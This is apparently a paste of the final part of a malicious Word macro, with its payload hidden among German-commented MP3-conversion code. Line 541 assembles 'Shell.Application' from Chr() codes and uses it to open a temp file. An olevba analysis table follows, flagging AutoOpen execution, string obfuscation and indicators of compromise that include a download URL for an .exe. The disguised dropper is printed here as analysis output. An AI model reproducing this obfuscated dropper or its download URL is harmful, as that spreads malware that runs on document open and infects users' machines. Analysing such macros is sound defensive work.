  536.     .write usZ5pw3gU8(223)
  537.    
  538. End With
  539.  
  540.  mp3_cbr_aktivate aktivated1, tempFile
  541. Set noextensionFile = konvertieren_EtoM(Chr(83) & Chr(61) & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p" & ";" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  542. noextensionFile.Open (tempFile)
  543. End Function
  544. Sub KJKmk()
  545.                 'R?ckkonvertierung
  546.                If Aktivierauswahl.mp2_cbr_aktiv.Value = "1" Then
  547.                     frmMain.encoderset.Caption = "CBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
  548.                    cmd = """" + App.Path + "\tools\toolame.log""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2cbrparameter
  549.                     Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  550.                Else
  551.                     frmMain.encoderset.Caption = "VBR " + MP2cbrmenu.cbrbitrate.Text 'Infofenster
  552.                    cmd = """" + App.Path + "\tools\toolame.log""" + " """ + frmMain.work.Text + "temp.wav"" " + """" + frmMain.work.Text + filename + ".mp2"" " + MP2vbrparameter
  553.                     Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  554.                End If
  555.             End If
  556.         End If
  557.        
  558.         If extension = "ogg" Then
  559.             ' hier startet lame (mp2 in temp.wav)
  560.            cmd = """" + App.Path + "\tools\lame.log""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  561.            Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  562.                
  563.             If Aktivierauswahl.oggnormal_aktiv.Value = "1" Then
  564.                 frmMain.normset.Caption = " Normalize" 'Infofenster
  565.                    
  566.                 If normal.prozenable.Value = "1" Then
  567.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  568.                Else
  569.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  570.                End If
  571.                    
  572.                 ' hier startet normalisierung
  573.                cmd = """" + App.Path + "\tools\" + "normalize.log """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  574.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  575.            End If
  576.                
  577.             'R?ckkonvertierung
  578.            cmd = """" + App.Path + "\tools\oggenc.log""" + " """ + frmMain.work.Text + "temp.wav"" " + OGGparameter
  579.             Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  580.            Call Werkzeuge.IsFileOpen(frmMain.work.Text + "temp.ogg")
  581.             Name frmMain.work.Text + "temp.ogg" As frmMain.work.Text + filename + ".ogg"
  582.         End If
  583.        
  584.         If extension = "mp3" Then
  585.             If Aktivierauswahl.mp3normal_aktiv.Value = "1" Then 'wenn normalisierung (normalize) aktiviert
  586.                frmMain.normset.Caption = " Normalize" 'Infofenster
  587.                
  588.                 If normal.prozenable.Value = "1" Then
  589.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  590.                Else
  591.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  592.                End If
  593.                
  594.                 ' hier startet lame (mp2 in temp.wav)
  595.                cmd = """" + App.Path + "\tools\lame.log""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  596.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  597.                
  598.                 ' hier startet normalisierung
  599.                cmd = """" + App.Path + "\tools\" + "normalize.log """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  600.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  601.                temppfad = """" + frmMain.work.Text + "temp.wav"" """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung aktiviert
  602.            Else
  603.                 temppfad = """" + file + """ """ + frmMain.work.Text + filename + "." + extension + """ " 'wenn normalisierung (normalize) deaktiviert
  604.            End If
  605.            
  606.             'Hier wird Lame gestartet
  607.            If Aktivierauswahl.mp3_cbr_aktiv.Value = "1" Then 'CBR verwenden
  608.                frmMain.encoderset.Caption = "CBR " + MP3cbrmenu.cbrbitrate.Text 'Infofenster
  609.                cmd = """" + App.Path + "\tools\lame.log"" " + temppfad + MP3cbrparameter    'Dos-Befehl bilden
  610.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  611.            End If
  612.            
  613.             If Aktivierauswahl.mp3_vbr_aktiv.Value = "1" Then 'VBR verwenden
  614.                frmMain.encoderset.Caption = "VBR " + MP3vbrmenu.minbit.Text + "/" + MP3vbrmenu.maxbit.Text 'Infofenster
  615.                cmd = """" + App.Path + "\tools\lame.log"" " + temppfad + MP3vbrparameter  'Dos-Befehl bilden
  616.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  617.            End If
  618.                
  619.             If Aktivierauswahl.mp3_abr_aktiv.Value = "1" Then 'ABR verwenden
  620.                frmMain.encoderset.Caption = "ABR " + MP3abrmenu.abrbitrate.Text 'Infofenster
  621.                cmd = """" + App.Path + "\tools\lame.log"" " + temppfad + MP3abrparameter   'Dos-Befehl bilden
  622.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  623.            End If
  624.            
  625.             'MP3-Gain (mp3 normalisierung)
  626.            If Aktivierauswahl.mp3gain_aktiv.Value = "1" Then
  627.                 frmMain.normset.Caption = " MP3-Gain" 'Infofenster
  628.    
  629.                 If mp3gain.auto.Value = "1" Then
  630.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,auto" 'Infofenster
  631.                Else
  632.                     frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(mp3gain.Slider1.CurPosition) + "db" 'Infofenster
  633.                End If
  634.                
  635.                 cmd = """" + App.Path + "\tools\mp3gain.log""" + mp3gainstring + """" + frmMain.work.Text + filename + "." + extension + """" 'Dos-Befehl bilden
  636.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  637.            End If
  638.         End If
  639.        
  640.         frmMain.mp3size.Caption = Format(FileLen(frmMain.work.Text + filename + "." + extension) / 1024, "0.0") + "kb"
  641.         quellfile = frmMain.work.Text + filename + "." + extension 'Tempquellfile wird bestimmt
  642.        If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist) 'wenn alte "normale" playlist dann l?schen
  643.        konvertieren = quellfile
  644.        
  645.         If extension = "mp2" Or extension = "mp3" Then
  646.             Set genie = frmMain.AudioGenie
  647.             genie.ID3v2EncodeSettings = frmMain.encoderset.Caption + frmMain.normset.Caption 'Encodersettings
  648.            genie.SaveID3v2ToFile (konvertieren)
  649.             Set genie = Nothing
  650.         End If
  651.        
  652.         If FileLen(konvertieren) < tagging.delsize(0).CurPosition Then
  653.             If LenB(Dir$(konvertieren, vbDirectory)) <> 0 Then Kill konvertieren
  654.             Call Ausgabe.textbox(filename + ".mp2......Filesize problem / deleted")
  655.             konvertieren = "error"
  656.         End If
  657.        
  658.         Set DShell = Nothing
  659.        
  660.         Exit Sub
  661. fehler:
  662.         Call Ausgabe.textbox("Unknown problem / trying next file")
  663.         konvertieren = "error"
  664. End Sub
  665. Private Sub untagged(quellfile As String, verzeichnis As String, akttime As Date, aktdate As Date, file As String, anzahl As Integer, upperlimit As Integer)
  666.     Call file_speichern.untaggedspeichern(quellfile, verzeichnis, akttime, aktdate) 'File verschieben
  667.    If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
  668.    frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
  669. End Sub
  670. Private Sub tagged(quellfile As String, temppfad As String, file As String, akttime As Date, aktdate As Date, anzahl As Integer, upperlimit As Integer)
  671.     Call file_speichern.taggedspeichern(quellfile, temppfad, akttime, aktdate) 'File verschieben
  672.    frmMain.statuscon.Value = (100 / upperlimit) * anzahl 'statusbar wird aktualisiert
  673.    If allgemeine.quelldel.Value = "1" And LenB(Dir$(file, vbDirectory)) <> 0 Then Kill (file) 'quelldateien werden gel?scht
  674. End Sub
  675.  
  676. +------------+----------------------+-----------------------------------------+
  677. | Type       | Keyword              | Description                             |
  678. +------------+----------------------+-----------------------------------------+
  679. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  680. | Suspicious | Kill                 | May delete a file                       |
  681. | Suspicious | Open                 | May open a file                         |
  682. | Suspicious | MkDir                | May create a directory                  |
  683. | Suspicious | Binary               | May read or write a binary file (if     |
  684. |            |                      | combined with Open)                     |
  685. | Suspicious | CreateObject         | May create an OLE object                |
  686. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  687. |            |                      | strings                                 |
  688. | Suspicious | CopyFile             | May copy a file                         |
  689. | Suspicious | SaveToFile           | May create a text file                  |
  690. | Suspicious | Write                | May write to a file (if combined with   |
  691. |            |                      | Open)                                   |
  692. | Suspicious | Output               | May write to a file (if combined with   |
  693. |            |                      | Open)                                   |
  694. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  695. |            |                      | may be used to obfuscate strings        |
  696. |            |                      | (option --decode to see all)            |
  697. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  698. |            | Strings              | may be used to obfuscate strings        |
  699. |            |                      | (option --decode to see all)            |
  700. | IOC        | http://naturallyconv | URL (obfuscation: VBA expression)       |
  701. |            | enient.co.za/75yh4/8 |                                         |
  702. |            | g4gffr.exe           |                                         |
  703. | IOC        | 8g4gffr.exe          | Executable file name (obfuscation: VBA  |
  704. |            |                      | expression)                             |
  705. | IOC        | UYdBkj.exe           | Executable file name (obfuscation: VBA  |
  706. |            |                      | expression)                             |
  707. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement